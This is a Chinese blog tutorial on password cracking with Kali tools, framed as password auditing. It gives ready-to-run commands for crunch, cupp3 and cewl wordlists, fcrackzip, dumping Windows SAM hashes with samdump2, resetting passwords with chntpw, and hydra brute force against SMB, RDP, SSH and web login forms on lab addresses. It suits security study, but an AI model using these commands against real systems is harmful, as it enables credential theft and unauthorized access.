用户口令审计1
作者:互联网
目录
crunch_创建字典工具
目标系统实施了强安全措施
- 安装了所有补丁、无任何已知漏洞
获取目标系统登录凭据
- 不会触发系统报警
身份认证
- 你知道什么(账号密码、pin、passphrase )
- 你有什么(令牌、token、key、 证书、密宝、手机)
- 你是谁(指纹、视网膜、虹膜、掌纹、声纹、面部识别)
- 以上方法结合使用(多因素身份认证)
密码破解方法
- 人工猜解
- 基于字典暴力破解(主流)
- 键盘空间字符暴破(困难)
字典
- 来自互联网信息泄漏
- 基于密码构成规则生成的字符组合文件
- 一个好的字典是破解成败的关键
crunch < min-len> <max-len> [< charset string>] [options] <charset string>默认是小写字符
-f指定字符集文件
/usr/share/crunch/charset.lst #按照小写、大写、数字、符号顺序
-b按大小分割字典文件(kb/kib、mb/mib、gb/gib )
-c按行数分割字典文件
以上两个参数必须与-o START结合使用
-d同一字符连贯出现数量
-s起始密码字符
-e结束密码字符
crunch 1 5 0123456789 -o pass.txt
crunch 7 7 0123456789 -o START -b 20mb #20mb一个文件,分块存储
crunch 6 6 0123456789 -o START -c 10000 #每10000条存储为一个文件
crunch 3 3 0123456789 -d 2 #同样的字符出现不能超过2次
crunch 5 5 0123456789 -s 20000 -e 20100 #20000开始,20100结束
crunch 1 1 -p 1234 #最大、最小字符长度失效,但必须存在,与-s参数不兼容
crunch 1 1 -p abc def 123 #-p参数指定基本字符串
crunch 1 1 -q a.txt #a.txt内容为abc def 123 效果和上边的一样
crunch 5 5 -t ddd%% -p dog cat bird #结合使用
crunch 5 5 -d 2@ -t @@@%% #小写字母出现不能超过2次
crunch 2 4 0123456789|aircrack-ng a.cap -e MyESSID -w - #管道符进行破解,随时生成随时破解
more /usr/share/crunch/charset.lst #crunch的字符集
crunch 5 5 -f /usr/share/crunch/charset.lst numeric #指定字符集内的内容生成字典
crunch字典组成规则
crunch 6 6 -t @,%%good
@ 小写字母lalpha
, 大写字母ualpha
% 数字numeric
^ 特殊符号symbols
输出文件压缩
crunch 4 4 -t @,%^ -o 1.txt -z 7z
其他压缩格式: gzip、bzip2、 lzma
7z压缩比率最大
wordlist——kali内建字典
└──╼ #tree /usr/share/wordlists/
/usr/share/wordlists/
├── dirb -> /usr/share/dirb/wordlists
├── dirbuster -> /usr/share/dirbuster/wordlists
├── dnsmap.txt -> /usr/share/dnsmap/wordlist_TLAs.txt
├── fasttrack.txt -> /usr/share/set/src/fasttrack/wordlist.txt
├── fern-wifi -> /usr/share/fern-wifi-cracker/extras/wordlists
├── metasploit -> /usr/share/metasploit-framework/data/wordlists
├── nmap.lst -> /usr/share/nmap/nselib/data/passwords.lst
├── rockyou.txt.gz
└── wfuzz -> /usr/share/wfuzz/wordlist
hashid/hash-identifier
加密算法
- 对称
- 非对称
- 单向(HASH)
- 单向加密
- 反向运算结果不唯一
- 被认为不可能解密
- 碰撞爆破
- MD2、MD4、MD5、SHA1、 SHA256、 SHA512.
hashid可识别约210种HASH算法类型
hashid 5f4dcc3b5aa765d61d8327deb882cf99
-e 显示包括加盐的HASH算法
-m 显示对应的hashcat模式编号
-j 显示对应的JohnTheRipper格式名称
加盐
盐是系统产生的随机数据
用于抵抗预算HASH表的密码爆破攻击
与某些加密技术中的nonce类似
保存在数据库中的用户密码应加盐
fcrackzip-ZIP压缩文件口令审计
破解ZIP加密文件密码
加密文件
zip --password password secure.zip file.txt
zip -e secure.zip file.txt
解密文件
unzip secure.zip
暴力破解
fcrackzip -b -c 'a1' -l 1-5 -u secure.zip
-b #brute force
-c #指定字符集(a、A、1、!、:),a1代表小写字母和数字组合,!为特殊字符
-l #密码长度
-u #过滤错误密码
字典破解
fcrackzip -D -p pass.txt -u 1.zip
-D #字典破解模式
-P #字典文件名
cupp3_cewl_fab-cewl-定制字典
cupp3
Cupp3
根据个人信息生成专属密码字典,姓名、昵称、生日、父母、宠物、爱好、常用词
cupp3 -l #下载字典文件
cupp3 -w dict.txt #基于已有字典演化生成增强字典
cupp3 -i #交互式提供组成密码的元数据信息
leet mode
1>1、a→@、e→3、t→7、0→0、s→$、1337
cewl
通过站点信息爬取构造用户名/密码的字符串
cewl https://www.xxx.com -d 1 -m 3 -w a.txt -k -c -e --email_file e.txt -a --meta_file m.txt
-d #爬网深度
-m #最小单词长度( --with-numbers包含数字)
-o #爬外站
-c #单词计数
-e #收集邮箱地址(作为用户名)
-a #收集元数据(author/creator ) , 作为用户名
-u #User Agent (--header,--cookie= )
--auth type #身份认证方法( Digest / basic )
--auth user #用户名
--auth pass #密码
--proxy_host #代理服务器地址
--proxy_port #代理端口
--proxy_username #代理帐号
--proxy_password #代理密码
fab-cewl
与cewl相同技术获取author/creator元数据
Office 2007 / PDF
samdump2-Windows口令摘要
- Windows系统帐号SAM数据库
- 存放用户名+密文形式的密码( HASH )
- 获得密码HASH则可进行暴力破解
- c:\windows\system32\config\
- samdump2 SYSTEM SAM
- LMHASH / NTLMHASH
在win7虚拟机插入kali镜像,重启系统,进入kali
fdisk -l
mount /dev/sda2 /mnt/
cd /mnt/Windows/System32/config
samdump2 SYSTEM SAM
chntpw-Windows口令修改
- 修改或清空密码
- SAM用户帐号数据库
- http:/ /www.chntpw.com/
- CD / USB镜像文件
- Kali中默认集成
- 包含无密码重置工具的Windows密码重置
Kali Linux Live引导电脑
修改帐号密码
chntpw -l SAM 列出SAM文件中的所有用户并退出
chntpw -i SAM 互动菜单系统
hydra
- 在线密码破解工具
- 支持多种常见协议(身份认证)
- 每种协议有不同的身份认证数据提交格式
- 根据提交数据的返回信息判断认证成功与否
- adam6500 asterisk cisco cisco-enable CVS firebird ftp ftps http[s]-{headlget|post} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram)digest}md5][s] mssqlmysql nntp oracle -listener oracle-sid pcanywhere pcnfs pop3[s] postgres radmin2 rdp redis rexec rlogin rpcap rsh rtsp s7-300 sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey SVn teamspeak telnet[s] vmauthd vnc xmpp
hydra -l [user] -p [pass] [service://server[:PORT][/OPT]]
hydra -l user -p password ftp://1.1.1.1.2121
hydra -L user.txt -P pass.txt smb://1.1.1.0/24
hydra -l user -P pass.txt -M targets.txt ssh
hydra -C cred.txt -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5
-C:login:pass
hydra -U pop3s #查询模块可用选项
hydra -l administrator -P rockyou.txt smb://192.168.0.128 #对win2003的密码破解
hydra -l administrator -P rockyou.txt rdp://192.168.0.128 #rdp远程桌面破解
-R 继续之前未完成的破解任务( hydra.restore )
-I 重新开始拉描(忽略hydra.restore )
-S 执行SSL连接(-O使用过时的SSLv2/v3)
-e nsr n空密码/s用户名作密码/r翻转的用户名做密码
-u 循环用户(默认循环密码)
-o 结果输出到文件
-Vv 详细信息
实时生成密码字典
-x MIN:MAX:CHARSET (小写a/大写A/数字1)
-x 3:5:aA1
-x 5:5:/%,-.
hydra -l administrator -x 3:5:1 -I smb://192.168.0.128 -Vv
-f/-F 成功退出(-f per host、-F global )
-t/-T 每主机并发连接数/全局并发连接数
-c 登录请求延时
-4/-6 IPv4/v6
-V/-v 详细信息/每次登录
图形化工具xhydra
基于表单的WEB应用程序密码破解
hydra -l admin -P rockyou.txt http-post-form "/dvwa/login.php:username=^USER^&password=^PASS^&Login=Login:S=index.php" 192.168.0.108 vV
S=index.ph p#S成功、F失败
C=/page/cookie:H='UA:firefox' #指定cookie获取页面和http头
hydra -U http-post-form 查看模块参数
pw-inspector-口令过滤
字典是密码破解成败的关键
了解密码规则可以提高密码破解效率,按照指定规则对字典进行筛选
pw-inspector -i i.txt -o o.txt -m 3 -M 5 -u -n -p -s -c 2
-l 小写字母
-u 大写字母
-n 数字
-p 可打印字符
-s 特殊符号
-c 密码最少包含集中字符集
标签:审计,crunch,hydra,--,用户,口令,密码,txt,字典 来源: https://blog.csdn.net/qq_34640691/article/details/110258486